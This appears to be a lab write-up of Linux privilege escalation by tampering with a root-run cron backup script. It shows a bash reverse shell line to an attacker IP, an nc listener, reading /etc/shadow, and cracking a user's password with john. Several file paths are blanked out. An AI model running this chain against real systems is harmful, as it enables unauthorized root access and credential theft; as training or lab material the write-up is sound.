Cron jobs exploits

Attack tree

1 Become root on Linux using cron jobs
    1.1 Find cron jobs from current user that run as root and may be exploited
    1.2 Change the script or program to start a reverse shell as root
    1.3 Listen and wait for it

Example: Backup script

ssh into the target machine and look at /etc/crontab:

Last login: Sun Jun 20 10:17:43 2021 from
$ cat /etc/crontab
* * * * *  root /
* * * * *  root
* * * * *  root /home/karen/
* * * * *  root /tmp/

Karen’s backup script and both run as root. Use either.

On the attack machine start a listener:

└─$ nc -lnvp 4444             
Ncat: Version 7.92 ( )
Ncat: Listening on :::4444
Ncat: Listening on

Change the backup script:

$ ls
$ mv
$ touch
$ nano

Put this code in:


bash -i >& /dev/tcp/<IP address attack machine>/4444 0>&1

And make the script executable:

$ chmod +x

On the attack machine:

└─# nc -lnvp 4444
Ncat: Version 7.92 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from <target IP address>.
Ncat: Connection from <target IP address>:55932.
bash: cannot set terminal process group (12785): Inappropriate ioctl for device
bash: no job control in this shell
root@target:~# python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@target:~# cat /etc/shadow | grep matt
cat /etc/shadow | grep matt
root@target:~# cat /etc/passwd | grep matt
cat /etc/passwd | grep matt

On the attack machine, copy matt’s shadow in shadow.txt and matt’s password in password.txt. Crack.

$ unshadow passwd.txt shadow.txt > crackmatt.txt

$ john --wordlist=/usr/share/wordlists/rockyou.txt crackmatt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 512/512 AVX512BW 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456           (matt)     
1g 0:00:00:00 DONE (2022-09-25 23:30) 3.225g/s 3303p/s 3303c/s 3303C/s 123456..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


Not really exploit usage, but based on files with incorrectly installed authorities.